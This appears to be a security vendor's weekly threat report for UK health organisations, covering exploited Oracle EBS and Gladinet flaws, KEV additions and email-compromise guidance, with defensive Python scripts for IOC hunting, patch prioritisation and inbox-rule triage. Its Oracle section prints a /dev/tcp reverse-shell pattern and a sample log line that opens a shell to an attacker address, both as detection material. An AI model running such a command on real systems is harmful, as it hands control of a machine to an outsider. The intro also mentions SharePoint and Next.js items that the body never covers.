Threat Feed

13.10.2025 Threat Report

Written by Craig Pepper | Oct 13, 2025 9:30:00 AM

In this week's report we are facing a mix of old vulnerabilities being weaponised and new attack methods emerging fast. From a critical Oracle E-Business Suite flaw already being exploited in the wild to a pair of fresh SharePoint zero-days and a worrying Next.js authorisation bypass, attackers are proving that no platform is off-limits.

Oracle E‑Business Suite zero‑day (CVE‑2025‑61882) is under active exploitation

Oracle released an emergency fix for a critical unauthenticated RCE in E‑Business Suite (EBS) after widespread exploitation by the Cl0p/“Graceful Spider” group. The flaw sits in the BI Publisher integration within Oracle Concurrent Processing and carries a CVSS 9.8. NHS England issued a High‑severity Cyber Alert, and the NCSC urged immediate action. Reporting from multiple outlets indicates exploitation began as early as August, with extortion emails sent to affected organisations and a public PoC/exploit archive circulating. Admins must apply Oracle’s out‑of‑band update (on top of prior CPU prerequisites) and hunt for signs of compromise—not just patch and move on.

EBS often underpins finance, HR, procurement, and supply chains in health providers and suppliers. Compromise risks sensitive payroll/PO data exposure, service disruption, and reputational harm that spills into clinical ops. Given active exploitation and leaked tooling, treat this as an incident response priority, not a routine patch.

Recommendations:

  • Apply Oracle’s security alert for CVE‑2025‑61882 and required prerequisite CPUs; verify to the current fixed build.

  • Isolate EBS from the internet; enforce WAF rules and restrict to trusted IPs/VPN.

  • Hunt for IOCs and unusual BI Publisher/Concurrent Processing activity; review outbound connections and reverse shells.

  • Rotate credentials, invalidate sessions, and check for web shell remnants if signs of exploitation exist.

IOCs:

  • 200[.]107[.]207[.]26 and 185[.]181[.]60[.]11 observed contacting EBS

  • Exploit artifacts: oracle_ebs_nday_exploit_poc_*.zip, exp.py, server.py

  • Reverse shell pattern: sh -c /bin/bash -i >& /dev/tcp// 0>&1
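The hunt step in the recommendations above can be scripted against web-tier access logs and process audit trails. The block below is an example added to this report, not Oracle's or any outlet's tooling: it refangs the two defanged addresses, matches the exploit artifact names, and matches the invariant parts of the reverse-shell pattern (whose host and port are elided in the report). The log format and the sample lines are constructed assumptions.

```python
"""Hunt log lines for the IOCs listed above: the two addresses seen contacting
EBS, the exploit artifact file names and the /dev/tcp reverse-shell pattern.
Example code added to this report, not Oracle's or any outlet's tooling; the
log format and the sample lines are constructed assumptions."""
import re

# Indicators exactly as printed in the report, defanged with [.] so they are not clickable.
DEFANGED_IPS = ["200[.]107[.]207[.]26", "185[.]181[.]60[.]11"]
ARTIFACT_PATTERNS = [r"oracle_ebs_nday_exploit_poc_\S*\.zip", r"\bexp\.py\b", r"\bserver\.py\b"]
# The report's reverse-shell pattern has its host and port elided, so match only the
# invariant parts: an interactive bash with I/O redirected to /dev/tcp/<host>/<port>.
REVERSE_SHELL_RE = re.compile(r"bash\s+-i\s*>&\s*/dev/tcp/[^\s/]*/\S*\s*0>&1")


def refang(ioc: str) -> str:
    """Turn a defanged indicator (200[.]107[.]207[.]26) back into a matchable address."""
    return ioc.replace("[.]", ".")


def compile_ip_regex(defanged):
    # Escape the dots and guard both ends so 200.107.207.26 does not match inside 200.107.207.261.
    alternatives = "|".join(re.escape(refang(ip)) for ip in defanged)
    return re.compile(r"(?<![\d.])(?:" + alternatives + r")(?![\d.])")


IP_RE = compile_ip_regex(DEFANGED_IPS)
ARTIFACT_RE = re.compile("|".join(ARTIFACT_PATTERNS))


def scan_line(line: str):
    """Return the IOC categories that fire on one log line (empty list if clean)."""
    hits = []
    if IP_RE.search(line):
        hits.append("c2_ip")
    if ARTIFACT_RE.search(line):
        hits.append("exploit_artifact")
    if REVERSE_SHELL_RE.search(line):
        hits.append("reverse_shell")
    return hits


def hunt(lines):
    """Map each matching line number (1-based) to the categories that fired on it."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := scan_line(line))}


# Constructed sample lines: an access log for the EBS web tier plus a process audit trail.
SAMPLE_LOGS = [
    '10.0.5.7 - - [06/Oct/2025:09:14:02 +0100] "GET /OA_HTML/AppsLocalLogin.jsp HTTP/1.1" 200 5120',
    '200.107.207.26 - - [06/Oct/2025:09:15:44 +0100] "POST /OA_HTML/OA.jsp HTTP/1.1" 200 212',
    'audit: uid=1001 cmd="sh -c /bin/bash -i >& /dev/tcp/185.181.60.11/4444 0>&1"',
    'audit: uid=1001 cmd="python3 exp.py --target ebs.internal"',
    '10.0.5.9 - - [06/Oct/2025:09:20:10 +0100] "GET /OA_HTML/AppsLogin HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for n, hits in hunt(SAMPLE_LOGS).items():
        print(f"line {n}: {', '.join(hits)} -> {SAMPLE_LOGS[n - 1]}")
```

Feed real access and audit logs through `hunt()` line by line; a `c2_ip` hit on its own justifies the credential rotation and web-shell sweep recommended above, and a `reverse_shell` hit means the host should be treated as compromised rather than merely patched.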


Gladinet CentreStack/Triofox zero‑day chain (CVE‑2025‑11371 → CVE‑2025‑30406) actively exploited

Huntress reported—and BleepingComputer confirmed—active exploitation of a new unauthenticated Local File Inclusion flaw (CVE‑2025‑11371) in Gladinet CentreStack and Triofox. Attackers read Web.config to extract machine keys, then pivot to previously disclosed deserialisation (CVE‑2025‑30406) for remote code execution via ViewState. At least three organisations are known victims; a vendor patch wasn’t yet available at publication, though a mitigation to disable the vulnerable temp handler is provided. These products are popular with SMBs/MSPs for on‑prem “private cloud” file sharing—common in clinics and health suppliers. Expect copy‑cat exploitation as details spread; prioritise mitigation and internet exposure reviews.

File‑sharing platforms often hold PII, HR, and clinical back‑office files. An RCE chain here can enable data theft, lateral movement, and ransomware staging—especially in environments relying on MSP‑managed stacks. Private providers and vendors are likely users; NHS suppliers may be exposed indirectly.

Recommendations:

  • Apply Gladinet’s temporary mitigation immediately (remove the temp handler line) and restrict external access; monitor for vendor patch.

  • Rotate machine keys and app secrets; invalidate sessions/tokens.

  • Hunt for ViewState exploitation and unusual app‑pool activity; review web server logs for UploadDownloadProxy access.

CISA adds actively exploited vulnerabilities to KEV (incl. Grafana path traversal)

CISA added multiple entries to its Known Exploited Vulnerabilities (KEV) catalogue last week, including a widely deployed Grafana path traversal (CVE‑2021‑43798). KEV additions indicate confirmed in‑the‑wild exploitation and are a strong predictor of real‑world risk. While these CVEs are not “new,” their active abuse makes them priority remediation items for any environment using the affected tech—particularly monitoring/observability stacks (Grafana) that often sit with elevated access. UK defenders should treat KEV updates as a ready‑made patching queue, mapped to business impact.

Many NHS providers and vendors run Grafana and similar tooling to monitor clinical apps and networks. A compromised monitoring platform gives attackers credentials, tokens and visibility for lateral movement. Align patch cycles to KEV—especially for internet‑exposed dashboards.

Recommendations:

  • Cross‑check the KEV additions from 6 and 9 October and fast‑track patches/mitigations; verify versions and exposure.

  • Lock down Grafana (restrict ingress, SSO/MFA, secrets scanning) and rotate tokens/credentials if exposure suspected.

  • Subscribe to KEV updates and feed them into risk‑based vulnerability management.
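Feeding KEV into risk-based vulnerability management means joining the catalogue to an asset inventory and ordering the result by business impact, not by CVE number. The block below is an example added to this report, not CISA tooling. The field names (cveID, vendorProject, product, dateAdded, dueDate, knownRansomwareCampaignUse) follow CISA's published KEV JSON feed; the catalogue extract, its dates and ransomware flags, and the inventory are constructed for illustration and are not claims about the live catalogue.

```python
"""Cross-check a KEV catalogue extract against a software inventory and produce a
prioritised patch queue.  Example code added to this report, not CISA's own tooling.
Field names follow CISA's published KEV JSON feed; the dates, ransomware flags and
the inventory below are constructed placeholders."""
from datetime import date

# Constructed KEV extract.  CVE IDs come from this report; dates and flags are placeholders.
KEV_SAMPLE = {
    "vulnerabilities": [
        {"cveID": "CVE-2021-43798", "vendorProject": "Grafana Labs", "product": "Grafana",
         "dateAdded": "2025-10-06", "dueDate": "2025-10-27", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-61882", "vendorProject": "Oracle", "product": "E-Business Suite",
         "dateAdded": "2025-10-06", "dueDate": "2025-10-27", "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-2025-30406", "vendorProject": "Gladinet", "product": "CentreStack",
         "dateAdded": "2025-04-08", "dueDate": "2025-04-29", "knownRansomwareCampaignUse": "Unknown"},
    ]
}

# Constructed asset inventory: product, internet exposure and a business-impact
# tier (1 = clinical or finance critical, 3 = low impact).
INVENTORY = [
    {"asset": "grafana-prod", "product": "Grafana", "internet_exposed": True, "tier": 2},
    {"asset": "ebs-finance", "product": "E-Business Suite", "internet_exposed": False, "tier": 1},
    {"asset": "jira-01", "product": "Jira", "internet_exposed": True, "tier": 3},
]


def kev_added_since(kev: dict, since_iso: str):
    """Catalogue entries added on or after the given ISO date (e.g. "2025-10-06")."""
    since = date.fromisoformat(since_iso)
    return [v for v in kev["vulnerabilities"] if date.fromisoformat(v["dateAdded"]) >= since]


def risk_score(entry: dict, asset: dict) -> int:
    """Simple risk ordering: a lower tier, internet exposure and known ransomware
    use each push an item up the queue."""
    score = (4 - asset["tier"]) * 10
    score += 5 if asset["internet_exposed"] else 0
    score += 5 if entry["knownRansomwareCampaignUse"] == "Known" else 0
    return score


def patch_queue(kev: dict, inventory: list, since_iso: str):
    """Join recent KEV entries to the inventory by product name and sort by risk,
    then by CISA due date, so the top of the list is what to patch first."""
    queue = []
    for entry in kev_added_since(kev, since_iso):
        for asset in inventory:
            if asset["product"].lower() == entry["product"].lower():
                queue.append({
                    "asset": asset["asset"], "cve": entry["cveID"],
                    "due": entry["dueDate"], "score": risk_score(entry, asset),
                })
    return sorted(queue, key=lambda q: (-q["score"], q["due"]))


if __name__ == "__main__":
    for item in patch_queue(KEV_SAMPLE, INVENTORY, "2025-10-01"):
        print(item)
```

Replace `KEV_SAMPLE` with the JSON downloaded from CISA and `INVENTORY` with your CMDB export; the product-name join is deliberately naive and in practice should be keyed on CPE or vendor/product pairs so that near-miss names do not drop entries silently.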

NCSC issues refreshed guidance on Business Email Compromise (BEC)

The NCSC published updated BEC guidance aimed at UK organisations. BEC remains a top route to financial loss, with attackers hijacking conversations, spoofing executives, and altering payment details. The guidance is practical: secure accounts with MFA and role‑based access, harden email (SPF/DKIM/DMARC), use strong approvals for financial changes, monitor for suspicious mailbox rules, and prepare incident playbooks. For health organisations and suppliers, BEC often targets procurement and patient‑fund pathways, turning simple inbox compromise into fraud and data disclosure. Use this to tighten controls before the next invoice diversion attempt.

Even where clinical systems are unaffected, BEC can drain funds, disrupt supplier relationships and expose patient data. Many NHS/private providers have complex supply chains—fertile ground for invoice fraud. The NCSC’s playbook offers low‑cost, high‑impact controls.

Recommendations:

  • Enforce MFA and conditional access; monitor for malicious inbox rules and impossible travel.

  • Implement DMARC with reject, and use out‑of‑band verification for bank detail changes.

  • Train approvers to spot thread‑hijack signs; ensure rapid payment recall paths are documented.
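Monitoring for malicious inbox rules, recommended twice above, comes down to a few heuristics: mail forwarded or redirected outside the organisation, messages silently deleted or parked in folders nobody reads, and rules keyed on finance terms. The block below is an example added to this report and is not part of the NCSC guidance. The rule field names (ForwardTo, RedirectTo, ForwardAsAttachmentTo, DeleteMessage, MoveToFolder, SubjectContainsWords) mirror those Exchange Online exposes for inbox rules, but the rules, the organisation domain and the keyword list are constructed assumptions.

```python
"""Flag inbox rules with the hallmarks of BEC persistence: forwarding or redirecting
mail externally, deleting or hiding messages, and keying on finance terms.
Example code added to this report, not part of the NCSC guidance.  Field names
mirror Exchange Online inbox-rule properties; the sample data is constructed."""

ORG_DOMAINS = {"example-trust.nhs.uk"}  # constructed: the organisation's own mail domains
FINANCE_TERMS = {"invoice", "payment", "bank", "remittance", "po", "wire"}
# Folders attackers commonly use to park hijacked threads out of sight (constructed list).
HIDDEN_FOLDERS = {"rss subscriptions", "rss feeds", "conversation history",
                  "deleted items", "archive", "junk email"}


def is_external(address: str) -> bool:
    """True when the recipient's domain is not one of ours."""
    domain = address.rsplit("@", 1)[-1].lower()
    return domain not in ORG_DOMAINS


def assess_rule(rule: dict) -> dict:
    """Return the BEC indicators one inbox rule exhibits and an overall severity."""
    findings = []
    for field in ("ForwardTo", "RedirectTo", "ForwardAsAttachmentTo"):
        for addr in rule.get(field) or []:
            if is_external(addr):
                findings.append(f"{field}_external")
    if rule.get("DeleteMessage"):
        findings.append("deletes_mail")
    if (rule.get("MoveToFolder") or "").lower() in HIDDEN_FOLDERS:
        findings.append("hides_in_folder")
    words = {w.lower() for w in (rule.get("SubjectContainsWords") or [])}
    if words & FINANCE_TERMS:
        findings.append("finance_keywords")

    exfil = any(f.endswith("_external") for f in findings)
    suppress = "deletes_mail" in findings or "hides_in_folder" in findings
    # External forwarding is always high; so is the classic thread-hijack setup where
    # finance mail is matched and then removed from view so the victim never sees replies.
    if exfil or ("finance_keywords" in findings and suppress):
        severity = "high"
    elif findings:
        severity = "medium"
    else:
        severity = "none"
    return {"name": rule["Name"], "severity": severity, "findings": findings}


def triage(rules):
    """Rules needing review, highest severity first, then by name for stable output."""
    order = {"high": 0, "medium": 1}
    flagged = [r for r in map(assess_rule, rules) if r["severity"] != "none"]
    return sorted(flagged, key=lambda r: (order[r["severity"]], r["name"]))


# Constructed sample rules as they might be exported from a finance user's mailbox.
SAMPLE_RULES = [
    {"Name": "Invoices to archive", "SubjectContainsWords": ["invoice", "payment"],
     "MoveToFolder": "RSS Subscriptions", "MarkAsRead": True},
    {"Name": "Copy to personal", "ForwardTo": ["finance.backup@example-mail.com"]},
    {"Name": "Clean up adverts", "SubjectContainsWords": ["advert"], "DeleteMessage": True},
    {"Name": "Drop bank notices", "SubjectContainsWords": ["bank"], "DeleteMessage": True},
    {"Name": "Team newsletter", "SubjectContainsWords": ["newsletter"], "MoveToFolder": "Newsletters"},
    {"Name": "Internal cc", "RedirectTo": ["shared.mailbox@example-trust.nhs.uk"]},
]

if __name__ == "__main__":
    for result in triage(SAMPLE_RULES):
        print(result["severity"].upper(), result["name"], result["findings"])
```

Run this over a periodic export of inbox rules across finance and procurement mailboxes; a new "high" result on an approver's mailbox is a strong signal that an account has already been compromised, and the rule's creation time bounds the window for which invoice and bank-detail changes should be re-verified out of band.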

This week’s priorities:

Patch Oracle EBS now and hunt for exploitation, mitigate Gladinet CentreStack/Triofox if in use, and action the KEV entries—especially Grafana. Round it off by tightening BEC controls in finance and procurement.

Need help? Speak with our team about our Threat Intelligence and tailored patch/hunt guidance for UK digital health.